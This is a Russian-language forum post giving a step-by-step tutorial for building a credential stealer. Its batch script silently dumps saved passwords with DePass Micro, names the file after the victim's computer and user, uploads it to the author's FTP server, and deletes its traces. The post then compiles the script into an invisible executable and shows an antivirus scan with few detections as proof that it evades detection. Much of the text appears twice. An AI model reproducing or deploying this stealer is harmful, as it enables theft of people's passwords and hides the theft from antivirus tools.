O
OUTCAST
Original poster
Делаем стиллер, отсылающий отчёты на FTP.
И так, начнём!
1. Скачиваем программу DePass Micro ().
Поподробнее:
@echo off — Отключаем вывод команд на экран.
MD %TEMP%\H85R6TGRDER_7T45BBO7BS4E — Создаём временную папку "H85R6TGRDER_7T45BBO7BS4E" в папке "Temp".
copy DePass_Micro.exe %TEMP%\H85R6TGRDER_7T45BBO7BS4E — Копируем файл "DePass_Micro.exe" в папку "H85R6TGRDER_7T45BBO7BS4E".
copy fcp.exe %TEMP%\H85R6TGRDER_7T45BBO7BS4E — Копируем файл "fcp.exe" в папку "H85R6TGRDER_7T45BBO7BS4E".
copy pthreadGC.dll %TEMP%\H85R6TGRDER_7T45BBO7BS4E — Копируем файл "pthreadGC.dll" в папку "H85R6TGRDER_7T45BBO7BS4E".
cd %TEMP%\H85R6TGRDER_7T45BBO7BS4E — Сменяем рабочий каталог на "%TEMP%\H85R6TGRDER_7T45BBO7BS4E".
DePass_Micro.exe /Silent /nm — Сохраняем пароли в файл .txt.
ren *.txt %COMPUTERNAME%_%USERNAME%.txt — Меняем имя нашего файла с паролями на "Имя компьютера"_"Имя пользователя".
fcp --user="Имя пользователя" --pass="Пароль" --server="Хост" --file=%COMPUTERNAME%_%USERNAME%.txt — Отправляем наш файл на FTP. Изменяем на своё то, что выделено красным цветом (кавычки не писать).
RD /s /q %TEMP%\H85R6TGRDER_7T45BBO7BS4E — Удаляем нашу временную папку.
del sqlite3.tmp — удаляем наш временный файл.
5. Открываем программу Bat To Exe Converter из папки "Portable".
6. Где "Bat файл", выбираем наш созданный батник.
7. В дереве "Видимость приложения", ставим чекбокс на "Невидимое приложение".
8. В дереве "Рабочий каталог", ставим чекбокс на "Временный каталог".
9. Переходим во вкладку "Включить".
10. Нажимаем на кнопку "Добавить", и выбираем эти файлы:
11. Нажимаем на кнопку "Компилировать".
PERFECT!
В папке, где вы создали батник, появится наш стиллер!
Стиллер весит 1,25 МБ.
Спасибо за внимание!
И так, начнём!
1. Скачиваем программу DePass Micro ().
Из скачанного архива, нам понадобится только файл "DePass_Micro.exe". Разархивируйте его в удобное вам место.
2. Скачиваем программу Bat To Exe Converter ().Из скачанного архива, нам понадобится только папка "Portable". Разархивируйте его в удобное вам место.
3. Скачиваем программу FTP Copy ().Открываем наш скачанный архив, и заходим в папку "fcp-0.2". Из этой папки, нам понадобится только 2 файла:
Код:
fcp.exe
pthreadGC.dll
Разархивируйте их туда, где файл "DePass_Micro.exe".
4. Создаём батник и наполняем его содержимым:
Код:
@echo off
MD %TEMP%\H85R6TGRDER_7T45BBO7BS4E
copy DePass_Micro.exe %TEMP%\H85R6TGRDER_7T45BBO7BS4E
copy fcp.exe %TEMP%\H85R6TGRDER_7T45BBO7BS4E
copy pthreadGC.dll %TEMP%\H85R6TGRDER_7T45BBO7BS4E
cd %TEMP%\H85R6TGRDER_7T45BBO7BS4E
DePass_Micro.exe /Silent /nm
ren *.txt %COMPUTERNAME%_%USERNAME%.txt
fcp --user="Имя пользователя" --pass="Пароль" --server="Хост" --file=%COMPUTERNAME%_%USERNAME%.txt
cd %TEMP%
RD /s /q %TEMP%\H85R6TGRDER_7T45BBO7BS4E
del sqlite3.tmp
@echo off — Отключаем вывод команд на экран.
MD %TEMP%\H85R6TGRDER_7T45BBO7BS4E — Создаём временную папку "H85R6TGRDER_7T45BBO7BS4E" в папке "Temp".
copy DePass_Micro.exe %TEMP%\H85R6TGRDER_7T45BBO7BS4E — Копируем файл "DePass_Micro.exe" в папку "H85R6TGRDER_7T45BBO7BS4E".
copy fcp.exe %TEMP%\H85R6TGRDER_7T45BBO7BS4E — Копируем файл "fcp.exe" в папку "H85R6TGRDER_7T45BBO7BS4E".
copy pthreadGC.dll %TEMP%\H85R6TGRDER_7T45BBO7BS4E — Копируем файл "pthreadGC.dll" в папку "H85R6TGRDER_7T45BBO7BS4E".
cd %TEMP%\H85R6TGRDER_7T45BBO7BS4E — Сменяем рабочий каталог на "%TEMP%\H85R6TGRDER_7T45BBO7BS4E".
DePass_Micro.exe /Silent /nm — Сохраняем пароли в файл .txt.
ren *.txt %COMPUTERNAME%_%USERNAME%.txt — Меняем имя нашего файла с паролями на "Имя компьютера"_"Имя пользователя".
fcp --user="Имя пользователя" --pass="Пароль" --server="Хост" --file=%COMPUTERNAME%_%USERNAME%.txt — Отправляем наш файл на FTP. Изменяем на своё то, что выделено красным цветом (кавычки не писать).
RD /s /q %TEMP%\H85R6TGRDER_7T45BBO7BS4E — Удаляем нашу временную папку.
del sqlite3.tmp — удаляем наш временный файл.
5. Открываем программу Bat To Exe Converter из папки "Portable".
6. Где "Bat файл", выбираем наш созданный батник.
7. В дереве "Видимость приложения", ставим чекбокс на "Невидимое приложение".
8. В дереве "Рабочий каталог", ставим чекбокс на "Временный каталог".
9. Переходим во вкладку "Включить".
10. Нажимаем на кнопку "Добавить", и выбираем эти файлы:
Код:
DePass_Micro.exe
fcp.exe
pthreadGC.dll
PERFECT!
В папке, где вы создали батник, появится наш стиллер!
Стиллер весит 1,25 МБ.
Спасибо за внимание!
СКАН
A-Squared: Clean
AVG Free: Clean
Ad-Aware: Clean
AhnLab V3 Internet Security: Clean
Avast: Clean
Avira: Clean
BitDefender: Clean
BullGuard: Clean
Clam Antivirus: PUA.Win.Packer.Purebasic-2
Comodo Internet Security: Clean
Dr. Web: Clean
ESET NOD32: Clean
F-PROT Antivirus: Clean
F-Secure Internet Security: Clean
FortiClient: Clean
G Data: Clean
IKARUS Security: Trojan.Atros4
Jiangmin Antivirus 2011: TrojanDownloader.Paph.ds
K7 Ultimate: Trojan ( 0050856d1 )
Kaspersky Antivirus: Clean
MS Security Essentials: Clean
Malwarebytes Anti-Malware: Clean
McAfee: Clean
NANO Antivirus: Clean
Norton Antivirus: Clean
Outpost Antivirus Pro: Clean
Panda Security: Trj/Genetic.gen
Quick Heal Antivirus: Clean
SUPERAntiSpyware: Clean
Solo Antivirus: Clean
Sophos: Clean
TrustPort Antivirus: Clean
Twister Antivirus: Clean
VBA32 Antivirus: Clean
VirIT eXplorer: Clean
Zillya! Internet Security: Clean
eScan Antivirus: Clean
eTrust-Vet: Clean
File Name: Stealer.exe
Detected by: 5/38
File Size: 1.25 MB
A-Squared: Clean
AVG Free: Clean
Ad-Aware: Clean
AhnLab V3 Internet Security: Clean
Avast: Clean
Avira: Clean
BitDefender: Clean
BullGuard: Clean
Clam Antivirus: PUA.Win.Packer.Purebasic-2
Comodo Internet Security: Clean
Dr. Web: Clean
ESET NOD32: Clean
F-PROT Antivirus: Clean
F-Secure Internet Security: Clean
FortiClient: Clean
G Data: Clean
IKARUS Security: Trojan.Atros4
Jiangmin Antivirus 2011: TrojanDownloader.Paph.ds
K7 Ultimate: Trojan ( 0050856d1 )
Kaspersky Antivirus: Clean
MS Security Essentials: Clean
Malwarebytes Anti-Malware: Clean
McAfee: Clean
NANO Antivirus: Clean
Norton Antivirus: Clean
Outpost Antivirus Pro: Clean
Panda Security: Trj/Genetic.gen
Quick Heal Antivirus: Clean
SUPERAntiSpyware: Clean
Solo Antivirus: Clean
Sophos: Clean
TrustPort Antivirus: Clean
Twister Antivirus: Clean
VBA32 Antivirus: Clean
VirIT eXplorer: Clean
Zillya! Internet Security: Clean
eScan Antivirus: Clean
eTrust-Vet: Clean
File Name: Stealer.exe
Detected by: 5/38
File Size: 1.25 MB